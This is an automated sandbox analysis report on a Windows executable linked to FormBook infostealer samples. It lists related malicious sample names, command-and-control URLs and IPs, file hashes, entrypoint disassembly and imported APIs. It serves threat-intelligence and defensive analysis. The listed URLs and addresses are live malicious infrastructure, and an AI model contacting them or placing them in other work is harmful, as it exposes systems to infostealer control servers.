                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      15:47:04API Interceptor1944196x Sleep call for process: rasdial.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      130.185.109.77cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                      • www.lgdiamonds.info/cv1w/
                                                      lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • www.lgdiamonds.info/cv1w/
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • www.lgdiamonds.info/cv1w/
                                                      New Order.exeGet hashmaliciousFormBookBrowse
                                                      • www.lgdiamonds.info/q2b2/
                                                      need quotations.exeGet hashmaliciousFormBookBrowse
                                                      • www.lgdiamonds.info/cv1w/
                                                      MaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.holzleisten24.shop/ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP
                                                      Product24573.exeGet hashmaliciousFormBookBrowse
                                                      • www.berlinhealthweek.com/bpg5/?ti-8=LyKdFPBKAe5W&5eb6=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==
                                                      Siirtokuitti_006703.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.printmyride.store/tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY
                                                      P5348574_74676.exeGet hashmaliciousFormBookBrowse
                                                      • www.berlinhealthweek.com/bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-P
                                                      535276_86376.exeGet hashmaliciousFormBookBrowse
                                                      • www.berlinhealthweek.com/bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm
                                                      13.248.169.48aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                      • www.fortevision.xyz/dash/
                                                      EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                      • www.sfantulandrei.info/wvsm/
                                                      bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                      • www.108.foundation/lnu5/
                                                      OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                      • www.tals.xyz/h8xm/
                                                      QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                      • www.hsa.world/09b7/
                                                      cNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                      • www.bcg.services/5onp/
                                                      3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                      • www.shipley.group/5g1j/
                                                      KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                      • www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
                                                      TU0kiz3mxz.exeGet hashmaliciousFormBookBrowse
                                                      • www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
                                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                      • www.bonheur.tech/t3iv/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      gtml.huksa.huhusddfnsuegcdn.comcNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      WDpjhC3jpq.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      Outstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      HUEtVS3MQe.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      www.lgdiamonds.infocNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      New Order.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      need quotations.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      AMAZON-02USNFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                      • 18.139.62.226
                                                      I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                                                      • 18.141.10.107
                                                      statement.docGet hashmaliciousKnowBe4Browse
                                                      • 52.217.123.201
                                                      9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                      • 76.223.67.189
                                                      aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                      • 13.248.169.48
                                                      EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                      • 13.228.81.39
                                                      invoice_AG60538.pdfGet hashmaliciousUnknownBrowse
                                                      • 143.204.205.214
                                                      bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                      • 18.139.62.226
                                                      OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                      • 54.244.188.177
                                                      QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                      • 13.248.169.48
                                                      XIRRADEcNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      New Order.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      need quotations.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      file.exeGet hashmaliciousSystemBCBrowse
                                                      • 185.169.24.192
                                                      Zam#U00f3wienie Z2300056_pdf .scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 185.169.24.118
                                                      New order -24900242 OP_pdf .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 185.169.24.118
                                                      vAZYIEQMP8.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 195.138.242.157
                                                      MaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 130.185.109.77
                                                      ESVC-ASNUScNDddMAF5u.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      WDpjhC3jpq.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      Outstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Temp\a155F05G

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\rasdial.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                      Category:dropped
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1239949490932863
                                                      Encrypted:false
                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                      MD5:271D5F995996735B01672CF227C81C17
                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\autD414.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\fFoOcuxK7M.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288256
                                                      Entropy (8bit):7.995348669440679
                                                      Encrypted:true
                                                      SSDEEP:6144:GxAQPVybdVVpe5NXBGgKQM14kECFAqzfk0Qz9K8Xl:GfPVyJVVpqNXJIECJzfVQZ3l
                                                      MD5:2803879FEB74DA0BBFD90D1DCC071F28
                                                      SHA1:1AC3AB28F40FF152A011435EF7219201865CB5E1
                                                      SHA-256:ADC11FD3677971BD1E8A1C3FD99DA98596B3543C5D03B360133689A929759E8C
                                                      SHA-512:25192E7637AD404BD4B061646D23B120BE074D5D812E089E5CF898FBA485F2E52230968B22D3E25B14DE101D648B85757E8F0ACF264F94F2A4AFFB3719B416B1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...3TEXQ@HNG..PV.87LO73W.XQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO7.WEX_[.@G.>.w.9{.nc[>6x!6')5*Zp5,VY#;.Q2e*$*h')ks..mUX(*.>ZO|QDHNGK7)WD..,(..7".l$/.].l-_.V..k%?.^..wW7..QT$rWT.EXQDHNGKg.VMt6MO..H.XQDHNGK7.VO9<MD73.AXQDHNGK7P6Y87L_73W5\QDH.GK'PVM:7LI73WEXQDNNGK7PVM8GHO71WEXQDHLG..PV]87\O73WUXQTHNGK7PFM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7~"(@CLO77.AXQTHNG.3PV]87LO73WEXQDHNGk7P6M87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNG

                                                      C:\Users\user\AppData\Local\Temp\palladize

                                                      Download File
                                                      Process:C:\Users\user\Desktop\fFoOcuxK7M.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288256
                                                      Entropy (8bit):7.995348669440679
                                                      Encrypted:true
                                                      SSDEEP:6144:GxAQPVybdVVpe5NXBGgKQM14kECFAqzfk0Qz9K8Xl:GfPVyJVVpqNXJIECJzfVQZ3l
                                                      MD5:2803879FEB74DA0BBFD90D1DCC071F28
                                                      SHA1:1AC3AB28F40FF152A011435EF7219201865CB5E1
                                                      SHA-256:ADC11FD3677971BD1E8A1C3FD99DA98596B3543C5D03B360133689A929759E8C
                                                      SHA-512:25192E7637AD404BD4B061646D23B120BE074D5D812E089E5CF898FBA485F2E52230968B22D3E25B14DE101D648B85757E8F0ACF264F94F2A4AFFB3719B416B1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...3TEXQ@HNG..PV.87LO73W.XQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO7.WEX_[.@G.>.w.9{.nc[>6x!6')5*Zp5,VY#;.Q2e*$*h')ks..mUX(*.>ZO|QDHNGK7)WD..,(..7".l$/.].l-_.V..k%?.^..wW7..QT$rWT.EXQDHNGKg.VMt6MO..H.XQDHNGK7.VO9<MD73.AXQDHNGK7P6Y87L_73W5\QDH.GK'PVM:7LI73WEXQDNNGK7PVM8GHO71WEXQDHLG..PV]87\O73WUXQTHNGK7PFM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7~"(@CLO77.AXQTHNG.3PV]87LO73WEXQDHNGk7P6M87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNGK7PVM87LO73WEXQDHNG

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.210131508271491
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:fFoOcuxK7M.exe
                                                      File size:1'227'776 bytes
                                                      MD5:72fc342138f06b0dfd4c6bdd3edd676d
                                                      SHA1:dfd756902a23521df608df3f809d71971059970b
                                                      SHA256:048a70dd4178e419339f012d993772ada047ca8222cae372e716e41e2a43545c
                                                      SHA512:5cb55be2d32d43391b4a32e095baf3e56846cef240cf1ac33ba5a211a27cf098da90bb8e1a4b635fcbe68e88b4bab8b871211f40fd4e21e52a02b0061a05129b
                                                      SSDEEP:24576:nu6J33O0c+JY5UZ+XC0kGso6FaM69VN4SK+/Ixh2cpWY:hu0c++OCvkGs9FaM6bN4SK+/IjIY
                                                      TLSH:4545CE2273DDC360CB669173BF6AB7016EBF7C614630B85B2F880D7DA950162162D7A3
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                      File Icon

                                                      Icon Hash:aaf3e3e3938382a0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x427dcd
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6758F65E [Wed Dec 11 02:18:06 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007F75F0E5A45Ah
                                                      jmp 00007F75F0E4D224h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [esp+10h]
                                                      mov ecx, dword ptr [esp+14h]
                                                      mov edi, dword ptr [esp+0Ch]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007F75F0E4D3AAh
                                                      cmp edi, eax
                                                      jc 00007F75F0E4D70Eh
                                                      bt dword ptr [004C31FCh], 01h
                                                      jnc 00007F75F0E4D3A9h
                                                      rep movsb
                                                      jmp 00007F75F0E4D6BCh
                                                      cmp ecx, 00000080h
                                                      jc 00007F75F0E4D574h
                                                      mov eax, edi
                                                      xor eax, esi
                                                      test eax, 0000000Fh
                                                      jne 00007F75F0E4D3B0h
                                                      bt dword ptr [004BE324h], 01h
                                                      jc 00007F75F0E4D880h
                                                      bt dword ptr [004C31FCh], 00000000h
                                                      jnc 00007F75F0E4D54Dh
                                                      test edi, 00000003h
                                                      jne 00007F75F0E4D55Eh
                                                      test esi, 00000003h
                                                      jne 00007F75F0E4D53Dh
                                                      bt edi, 02h
                                                      jnc 00007F75F0E4D3AFh
                                                      mov eax, dword ptr [esi]
                                                      sub ecx, 04h
                                                      lea esi, dword ptr [esi+04h]
                                                      mov dword ptr [edi], eax
                                                      lea edi, dword ptr [edi+04h]
                                                      bt edi, 03h
                                                      jnc 00007F75F0E4D3B3h
                                                      movq xmm1, qword ptr [esi]
                                                      sub ecx, 08h
                                                      lea esi, dword ptr [esi+08h]
                                                      movq qword ptr [edi], xmm1
                                                      lea edi, dword ptr [edi+08h]
                                                      test esi, 00000007h
                                                      je 00007F75F0E4D405h
                                                      bt esi, 03h
                                                      jnc 00007F75F0E4D458h

                                                      Rich Headers

                                                      Programming Language:
                                                      • [ASM] VS2013 build 21005
                                                      • [ C ] VS2013 build 21005
                                                      • [C++] VS2013 build 21005
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2013 UPD4 build 31101
                                                      • [RES] VS2013 build 21005
                                                      • [LNK] VS2013 UPD4 build 31101

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x63364.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x12b0000x711c.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xc70000x633640x63400ef923991c73356d929ed53d2e2f326caFalse0.9340586626259446data7.907113106302105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x12b0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                      RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                      RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                      RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                      RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                      RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                      RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                      RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                      RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                      RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                      RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                      RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                      RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                      RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                      RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                      RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                      RT_RCDATA0xcf7b80x5a629data1.0003268353425154
                                                      RT_GROUP_ICON0x129de40x76dataEnglishGreat Britain0.6610169491525424
                                                      RT_GROUP_ICON0x129e5c0x14dataEnglishGreat Britain1.25
                                                      RT_GROUP_ICON0x129e700x14dataEnglishGreat Britain1.15
                                                      RT_GROUP_ICON0x129e840x14dataEnglishGreat Britain1.25
                                                      RT_VERSION0x129e980xdcdataEnglishGreat Britain0.6181818181818182
                                                      RT_MANIFEST0x129f740x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                      Imports

                                                      DLLImport
                                                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                      PSAPI.DLLGetProcessMemoryInfo
                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                      UxTheme.dllIsThemeActive
                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, 